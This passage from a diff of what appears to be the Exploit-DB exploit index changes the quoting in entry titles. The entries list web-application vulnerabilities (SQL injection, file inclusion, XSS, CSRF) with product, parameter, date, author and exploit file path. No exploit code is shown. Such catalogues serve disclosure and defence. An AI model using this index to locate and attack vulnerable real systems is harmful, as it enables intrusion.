Keong",php,webapps,0 -26982,platforms/php/webapps/26982.txt,"IceWarp Universal WebMail - '/mail/settings.html' 'Language' Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26983,platforms/php/webapps/26983.txt,"IceWarp Universal WebMail - '/mail/index.html' 'lang_settings' Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26981,platforms/php/webapps/26981.txt,"IceWarp Universal WebMail - '/dir/include.html lang' Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26982,platforms/php/webapps/26982.txt,"IceWarp Universal WebMail - '/mail/settings.html Language' Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26983,platforms/php/webapps/26983.txt,"IceWarp Universal WebMail - '/mail/index.html lang_settings' Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - '/mail/include.html' Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0 26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0 40575,platforms/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,php,webapps,0 @@ -29490,9 +29492,9 @@ id,file,description,date,author,platform,type,port 27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 - Invoices.php SQL Injection",2005-12-25,r0t3d3Vil,php,webapps,0 27030,platforms/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,php,webapps,0 27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 -27034,platforms/asp/webapps/27034.txt,"OnePlug CMS - '/press/details.asp' 'Press_Release_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 -27035,platforms/asp/webapps/27035.txt,"OnePlug CMS - '/services/details.asp' 'Service_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 -27036,platforms/asp/webapps/27036.txt,"OnePlug CMS - '/products/details.asp' 'Product_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27034,platforms/asp/webapps/27034.txt,"OnePlug CMS - '/press/details.asp Press_Release_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27035,platforms/asp/webapps/27035.txt,"OnePlug CMS - '/services/details.asp Service_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27036,platforms/asp/webapps/27036.txt,"OnePlug CMS - '/products/details.asp Product_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 27037,platforms/php/webapps/27037.txt,"TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27038,platforms/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection",2013-07-23,Vulnerability-Lab,php,webapps,0 @@ -29540,7 +29542,7 @@ id,file,description,date,author,platform,type,port 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php Username' SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 @@ -29600,8 +29602,8 @@ id,file,description,date,author,platform,type,port 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 - showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 27183,platforms/php/webapps/27183.txt,"Farsinews 2.1/2.5 - 'show_archives.php' template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 -27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - 'addressbook.update.php' 'contactgroupid' Parameter Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 -27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - 'folders.update.php' 'folderid' Parameter Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 +27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - 'addressbook.update.php contactgroupid' Parameter Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 +27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - 'folders.update.php folderid' Parameter Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - 'index.php' $_SERVER['PHP_SELF'] Cross-Site Scripting",2006-02-11,"GulfTech Security",php,webapps,0 27187,platforms/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Persistent Cross-Site Scripting",2013-07-29,drone,jsp,webapps,0 27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,ios,webapps,0 @@ -29612,13 +29614,13 @@ id,file,description,date,author,platform,type,port 27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 -27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - 'readfolder.php' 'path' Parameter Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 +27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - 'readfolder.php path' Parameter Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0 27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload",2006-02-11,zjieb,php,webapps,0 27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - search.php Q Parameter Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps,0 27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 -27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php' 'check_login()' Function Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 +27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php check_login()' Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - u2u.php 'Username' Parameter Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps,0 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - header.php Pagetitle Parameter Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps,0 @@ -29627,15 +29629,15 @@ id,file,description,date,author,platform,type,port 27214,platforms/php/webapps/27214.txt,"DELTAScripts PHP Classifieds 6.20 - Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 27215,platforms/php/webapps/27215.txt,"sNews - Comment Body Cross-Site Scripting",2006-02-14,joffer,php,webapps,0 27216,platforms/php/webapps/27216.txt,"sNews - 'index.php' Multiple Parameter SQL Injection",2006-02-14,joffer,php,webapps,0 -27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - '/modules/projects/gantt.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27218,platforms/php/webapps/27218.txt,"dotProject 2.0 - '/includes/db_connect.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27219,platforms/php/webapps/27219.txt,"dotProject 2.0 - '/includes/session.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27220,platforms/php/webapps/27220.txt,"dotProject 2.0 - '/modules/projects/gantt2.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27221,platforms/php/webapps/27221.txt,"dotProject 2.0 - '/modules/projects/vw_files.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27222,platforms/php/webapps/27222.txt,"dotProject 2.0 - '/modules/admin/vw_usr_roles.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - '/modules/public/calendar.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - '/modules/public/date_format.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - '/modules/tasks/gantt.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - '/modules/projects/gantt.php dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27218,platforms/php/webapps/27218.txt,"dotProject 2.0 - '/includes/db_connect.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27219,platforms/php/webapps/27219.txt,"dotProject 2.0 - '/includes/session.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27220,platforms/php/webapps/27220.txt,"dotProject 2.0 - '/modules/projects/gantt2.php dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27221,platforms/php/webapps/27221.txt,"dotProject 2.0 - '/modules/projects/vw_files.php dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27222,platforms/php/webapps/27222.txt,"dotProject 2.0 - '/modules/admin/vw_usr_roles.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - '/modules/public/calendar.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - '/modules/public/date_format.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - '/modules/tasks/gantt.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0 27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 @@ -29673,11 +29675,11 @@ id,file,description,date,author,platform,type,port 27495,platforms/php/webapps/27495.txt,"PHPCOIN 1.2 - mod_print.php fs Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27496,platforms/php/webapps/27496.txt,"PHPCOIN 1.2 - mod.php fs Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 -27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection",2013-08-02,Raw-x,php,webapps,0 +27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang' Parameter SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0 27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27279,platforms/php/webapps/27279.txt,"vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 -27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 +27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php page_name' Parameter SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 27286,platforms/hardware/webapps/27286.txt,"MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -29742,7 +29744,7 @@ id,file,description,date,author,platform,type,port 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 -27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 - 'search.php' 'keyword' Parameter POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 +27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 - 'search.php keyword' Parameter POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - 'comments_do.php' Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0 @@ -29851,7 +29853,7 @@ id,file,description,date,author,platform,type,port 27513,platforms/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injections",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps,0 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Cross-Site Request Forgery (Adding/Editing New Administrator Account)",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 -27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php' 'id' Parameter SQL Injection",2013-08-12,3spi0n,php,webapps,0 +27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id' Parameter SQL Injection",2013-08-12,3spi0n,php,webapps,0 27519,platforms/php/webapps/27519.txt,"PHPVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 @@ -29897,7 +29899,7 @@ id,file,description,date,author,platform,type,port 27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - Deptname Parameter Cross-Site Scripting",2006-04-07,r0t,cgi,webapps,0 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 -27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection",2006-04-10,Psych0,php,webapps,0 +27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php type' Parameter CRLF Injection",2006-04-10,Psych0,php,webapps,0 27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 @@ -30063,7 +30065,7 @@ id,file,description,date,author,platform,type,port 27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 - viewcat.php Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 -27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php' 'path' Parameter Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 +27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php path' Parameter Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injections",2006-05-03,almaster,php,webapps,0 @@ -30094,8 +30096,8 @@ id,file,description,date,author,platform,type,port 27835,platforms/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple Parameter SQL Injections",2006-05-08,r0t,php,webapps,0 27836,platforms/php/webapps/27836.txt,"Creative Software UK Community Portal 1.1 - DiscReply.php mid Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27837,platforms/php/webapps/27837.txt,"EvoTopsite 2.0 - 'index.php' Multiple SQL Injections",2006-05-08,"Hamid Ebadi",php,webapps,0 -27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php' 'pfad' Parameter Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 -27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php' 'pfad' Parameter Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 +27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php pfad' Parameter Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 +27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php pfad' Parameter Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 27840,platforms/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - 'index.php' pfad Parameter Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 27841,platforms/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 - galerie.php id Parameter Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 @@ -30112,7 +30114,7 @@ id,file,description,date,author,platform,type,port 27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php' rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - diapo.php rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 - affich.php image Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 -27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php' 'rep' Parameter Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 +27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php rep' Parameter Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 27868,platforms/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - CFG[popphoto_base_path] Parameter Remote File Inclusion",2006-05-15,VietMafia,php,webapps,0 27869,platforms/php/webapps/27869.txt,"PHP Script Tools PSY Auction - item.php id Parameter SQL Injection",2006-05-15,Luny,php,webapps,0 27870,platforms/php/webapps/27870.txt,"PHP Script Tools PSY Auction - email_request.php user_id Parameter Cross-Site Scripting",2006-05-15,Luny,php,webapps,0 @@ -30281,7 +30283,7 @@ id,file,description,date,author,platform,type,port 28122,platforms/php/webapps/28122.txt,"vCard PRO - search.php event_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 -28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php' 'value' Parameter SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 +28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value' Parameter SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,php,webapps,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 @@ -30323,9 +30325,9 @@ id,file,description,date,author,platform,type,port 28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - 'admin/fix_content.php' 'submit' Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - 'admin/fix_content.php submit' Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 -28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 +28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php cat_id' Parameter SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 @@ -30357,12 +30359,12 @@ id,file,description,date,author,platform,type,port 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 +28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php b' Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 -28261,platforms/php/webapps/28261.txt,"RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 +28261,platforms/php/webapps/28261.txt,"RadScripts - 'a_editpage.php Filename' Parameter Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 @@ -30398,7 +30400,7 @@ id,file,description,date,author,platform,type,port 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 -28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 +28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php subdir' Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie - Quick_Path Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 @@ 